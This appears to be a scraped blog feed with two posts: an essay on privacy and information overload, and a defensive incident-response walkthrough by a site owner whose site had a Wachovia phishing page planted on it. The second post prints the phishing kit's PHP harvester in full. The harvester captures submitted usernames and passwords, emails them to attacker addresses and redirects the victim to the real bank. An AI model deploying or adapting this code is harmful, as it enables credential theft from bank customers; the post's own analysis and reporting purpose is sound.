Chronosynclastic Infundibulum » security http://www.semanticoverload.com The world through my prisms Thu, 07 Apr 2011 17:36:17 +0000 en-US hourly 1 http://wordpress.org/?v=3.5 If a tree falls in the forest… http://www.semanticoverload.com/2010/08/04/if-a-tree-falls-in-the-forest/ http://www.semanticoverload.com/2010/08/04/if-a-tree-falls-in-the-forest/#comments Thu, 05 Aug 2010 04:42:25 +0000 Semantic Overload http://www.semanticoverload.com/?p=570 “If a tree falls in the forest and there is no one to hear it, does it still make a sound?” This, in essence, is the issue of privacy. If a specific action (or information) is unobservable (even after the fact) by no one else but the actor, then that act (or information) is, by definition, private. The actor could potentially by a single individual or a cohort. Now, because we are in the so-called “information age”, increasingly greater portions of our actions and our information are becoming observable. Unfortunately, very few of us realize this, and so many actions that we thought were private, are not so, and this getting a lot of people into hot water. Naturally, there is a backlash, and resulting turbulence is now presenting itself in all its glory all over the Internet.

Even though there is a lot of noise about privacy issues, there isn’t really anyone with a clear picture on where things are, where they will be heading, where they should be heading, and how do we as individuals adapt to these changes. I think the problem is that of methodology. People are trying to solve new-age problems with old-age tools; it’s not going to work. In this post, I attempt to explain my foregoing sentences.

Fatalists and conservatives. Let us take a look at the two major camps on the issue of privacy today. On one side you have the likes of Mark Zukerberg, David Thomson, and Samy Kamkar who believe that privacy is dead (the fatalists), and on the other side you have the likes of Future of Privacy Forum and Bruce Schneier who believe that maintaining our privacy is only a matter of setting up the right legal/economic framework of incentives and disincentives within the present (and future) context (the conservatives).

Both camps have valid points. Despite all the brouhaha about privacy issues with facebook, facebook continues to add more users, and current users continue to treat facebook as their repository of their social life and social interactions. So maybe privacy really is dead! But the very fact that there is such a backlash reveals the fissure in society where you have a significant faction that jealously guards many of its actions and its information, but finds that it is not able to maintain its privacy because ‘other entities’ (friends, banks, credit card companies, and such) are making them public. And there are still others who simply do not realize that what they think is private really is not. So the question is, what is the state of the art on this issue?

Privacy vs. Security. The first problem that you encounter when trying to answer that question is that there no common understanding of what privacy really is. Often people bleed their concerns of security into the issue of privacy. This is muddying the waters to the point where no coherent narrative emerges. While security is and should always be a grave concern, it an orthogonal issue to privacy. One possible consequence of loss of privacy is that the security of our property and resources is at jeopardy, but that is not a basis to conflate privacy with security. There should be separate discussions on each issue. They may complement each other but one should not supplement the other. Remember, a secure life does not guarantee a private life!

Privacy through public obscurity. Now that we know we talking exclusively about privacy and not security, we can move forward. In the past privacy has been protected largely due to the technological limitations that made several tasks intractable. Such intractability lead to privacy through public obscurity. For example, before the advent of telegraph and telephone, there was very little to worry about legitimate information about your activities (that you deem private) to your relatives in a different state. Why? Because of what I like to call Chinese-Whispers effect. But that changes with the ubiquity of telephones. Similarly, before the advent of the internet, at any point in your life, you were free to ‘reinvent’ yourself by simply moving to a new town, getting a new job and simply not citing individuals from your old life as references. There was very little anyone could reasonably do to dig up your past life (of course, you could always hire a private-eye, but that would constitute an unreasonable effort).

In fact, the privacy of your online communications with your bank are established by privacy through public obscurity. Worried? Don’t be, not for now at least. All `secure’ online communications use what is called public-key cryptography which involves dealing with numbers that have 100-200 digit prime numbers as their factors and encrypting messages with these numbers. In order to decrypt the message, one has to be able to factorize the large number into its constituent large prime numbers. The fastest-to-date mechanism to factorize a number is still by brute-force, and hence intractable. For even the fastest computers, this task could take years, by which time the contents of your private communication will be (hopefully) irrelevant. Thus, privacy through public obscurity.

I bring up the example of public-key encryption for a reason: the task of factorizing large numbers, although intractable right now, might not be so in the future (it wont be because the computer got faster, it will be because either quantum computers become a reality, or the answer to the famous P=NP problem in computer science is the affirmative). If that happens, then what do you think society’s response will be? Do you do expect two camps: one that says cryptography is dead, and another one that says all mechanisms to factorize numbers should be outlawed or disincentivised some how? Of course not. That’s an absurd proposition! The response will be to build a better cryptographic technique that works despite the state of the art.

We are facing a similar situation with privacy today, and the two camps that I referred to earlier are not helping. The fact remains that these days more often than not someone is hearing a tree fall in the forest, and so more trees are making a sound when they fall. So how do we deal with it?

First, learn to give up some of your privacy. Technology has made a lot of tasks tractable, and our physical and mental abilities and faculties are not evolving at a rate to match the pace of technology. Consequently, we are not able to make all our actions intractable to the new technology. So we have to give up some of our privacy. While this may be a ghastly notion for people in the western hemisphere, it is surprisingly common for societies in the eastern hemisphere to trade privacy for social support structure, security, and (more controversially) for happiness. Much like we have given up privacy for air flights but not for bus or train journeys, we may have to give up privacy in certain aspects of your life that we had otherwise considered to be private.

As for the natural follow-up question, what aspect of our privacy do we have to give up, I honestly don’t know. My speculations and proposals here are of methodological nature. I am not answering questions. I am just trying to figure out what the right questions to ask are! Isn’t that the first step in arriving at a resolution to our privacy issues?

Second, indulge in information overload. The less information you give out, the more useful every extra bit of information about you is. Inevitably, despite your best efforts, more information about you will leak out. So how do you counter that? With information overload. Take Hasan Elahi as a classic example. After he was erroneously put on the FBI terrorist watch list, and he had to endure a gruelling questioning by the FBI that took up hours of his time and ultimately to no one’s benefit, he decide to turn the tables on FBI. He put up a website called Tracking Transience where he has up up pictures, videos, and all sorts of evidence of where he has been and what he has been doing every hour of every day! Since there is already so much information about him available, any additional information about him is not so useful any more. Curiously, he doesn’t appear in any of this photographs. He is one behind the camera. So in a sense although he has given you so much information about him, he really hasn’t given you anything that is remarkably useful. Paradoxically, by revealing so much about himself online, he has secured his privacy. [For details, visit: http://memes.org/tracking-transience-hasan-elahi]

Ok, so Tracking Transience works for Hasan, what about the rest of us? Again, I am only showing you where to being asking the right questions; I do not have answers for you.

Are there any more tools of this or different kind that we can employ? Arguably, yes. One needs to look harder, and looks at different places. The new tools are different in kind, and presumably, in an ironic twist, an artefact the technology that has precipitated the issue of privacy in the first place.

In conclusion, my argument simply is that you cannot use old tools of fatalism, legal recourse, and economic regulation to frame the debate of privacy and expect a resolution. They are simply the wrong tools for the job! I will wrap this post up by continuing with the metaphor with which I started this article: if the tree falls in the forest and there are people to hear it, then let them hear it, but make sure that every minute sound made by the tree and the trees around it are perpetually amplified and broadcast to where the sound made by the falling tree become noise and simply irrelevant!

]]>
http://www.semanticoverload.com/2010/08/04/if-a-tree-falls-in-the-forest/feed/ 0
If your site has been compromised with phishing attack code… http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/ http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/#comments Tue, 17 Mar 2009 07:30:42 +0000 Semantic Overload http://www.semanticoverload.com/?p=316 I recently recevied the following email:

To whom it may concern:

Please be aware that Wachovia Corporation (“Wachovia”) is the owner of numerous United States and foreign trade marks and services marks used in connection with its financial services and products (the “Wachovia Marks”), including the Wachovia wordmark and Wachovia logo.  Wachovia has expended substantial resources to advertise and promote its products and services under the marks and considers the marks to be valuable assets of Wachovia.

It has come to our attention that your company is hosting a known active phishing site.  The active phishing site displays the Wachovia Marks and is intended to defraud customers in an attempt to capture and use their identity.  Network Whois records indicate the IP address of the phishing site is registered to your Internet space.

Accordingly, we request that your site bring down the Phishing web site at:
<< http://<my website>/home/plugins/editors-xtd/confirm.html >>

So that’s how I knew that my site had been compromised by hackers and a phishing attack code had been injected into my site. If it has happened to you, do you know what is the right thing to do? How do you fix it? Well, here is what I did, and I think it is worthwhile to share this information so that it may be useful to others.. So here goes.

Step 1. Disable Your Site

First, disable your site, bring it down temporarily. The last thing you want is for more people to be scammed by a hacker who compromised your site. You can do that by disabling all access to all the files within your website. If the website is running on unix/linux you can do a “chmod -R 000 <website-home-directory>” (Refer to the chmod tutorial here). For those using cpanel, go to the file manager and change the permissions of the document root for the website.

Step 2. Investigate the Offending Webpage

Now that no more unsuspecting users can be affected by this phishing attack. Now we dig into the offending webpage that is causing the problem. In my case it was: http://<my website>/home/plugins/editors-xtd/confirm.html

I opened up the html file, and this is what I saw:

……

<html xmlns=”http://www.w3.org/1999/xhtml”><head>

<title>Wachovia – Personal Finance and Business Financial Services</title>

……

Clearly, someone was impersonating the Wachovia website. Now, with phishing, someone is trying to steal your username and password by impersonating some crediable website that needs your username and password to get into. In HTML, this is typically accomplished through ‘forms’, which starts with a `<form>’ tag in HTML. So I dug through the code and I saw two form tags.

The first one was:

<form method=”get” action=”http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do?” name=”searchForm” onsubmit=”return verifyQuery(this.searchString);”>

…..

This looks fine because the ‘action’ parameter points to http://search.wachovia.com/selfservice…. which is a search script on the Wachovia website. So anyone filling you this form is sendin their data to the Wachovia website and the hacker will not get any information from it.

Now to the second form tag:

<form method=”post” action=”screen.php” name=”uidAuthForm” id=”uidAuthForm” onsubmit=”return submitLogin(this)”>

……

Aha! The smoking gun! Why? Well, look at the ‘action’ parameter in this ‘form’ tag, it says ‘screen.php’ which is clearly not a script that is on the Wachovia servers, but something that is hosted on my website! So the hackers installed another script on my system to phish the username and passwords. Now I go see what’s inside this ‘screen.php’ file that is located in the same directory as the ‘confirm.html’ file we have been looking at so far.

Step 3. Isolate the script that is doing the actual phishing attack and find the offenders

So I open up the ‘screen.php’ file and this is what I find:

<?php

$ip = getenv(“REMOTE_ADDR”);
$datamasii=date(“D M d, Y g:i a”);
$userid = $HTTP_POST_VARS["userid"];
$password = $HTTP_POST_VARS["password"];
$mesaj = “Hello
userid : $userid
password : $password
——–0WN3d By Louis—————-
IP : $ip
DATE : $datamasii
“;

$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;
$subject = “Take What U need But Make Sure U Cash It Out !!!”;

mail($recipient,$subject,$mesaj);
mail($to,$subject,$mesaj);
header(“Location: http://www.wachovia.com/helpcenter/0,,,00.html”);
?>

So here we are! Gotcha! Check out the line ‘$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;’ Clearly, the phishing attack was being carried out by the following two email addresses: cashbug5010@gmail.com and smithgreen@hotmail.com. Now that I have this much information, what do we do next?

Step 4. Inform the Authorities

We give this information to the authorities who can carry the investigation forward. And who are they? First, respond back to the email address that alerted you of this phishing attack (do a ‘reply all’ if there were multiple recipients/Cc’s to the email you received). Also, copy phishing-report@us-cert.gov and cert@cert.org to this email and just give them a copy of the phishing code (in this case it was the file ‘screen.php’) and the offending email addresses you found.

As for now, that is all you can do, and just co-operate with the authorities if they need more information.

Step 5. Quarantine the Malicious Code and Restore Your Website

Quarantine the files (by disabling their permission to ’000′) and now that the code has been quarantined, you can bring your website up again by setting the permission back to as they were earlier (except for the offending code).

DO NOT DELETE THE MALICIOUS CODE BECAUSE IT IS EVIDENCE AGAINST THE PHISHING ATTACK AND EXONERATES YOU! Otherwise, the authorities may pursue you as an accessory to the crime!

Step 6. Inform Google That Your Site is Safe Again

Now, note that the odds are that Google has already put a notice out against your site as a source of a phishing attack. So go to the following URL http://www.google.com/safebrowsing/report_error/ to let Google know that the problem has been taken care off and you site is safe again.

And that’s all you can do for the moment. Make sure your site is secure and you haven’t given permission to any of your directories to be writable by anyone except you. As for preventing future security breaches, it is always a cat-and-mouse game with hackers and like of you getting smarter and better than the other.

]]>
http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/feed/ 7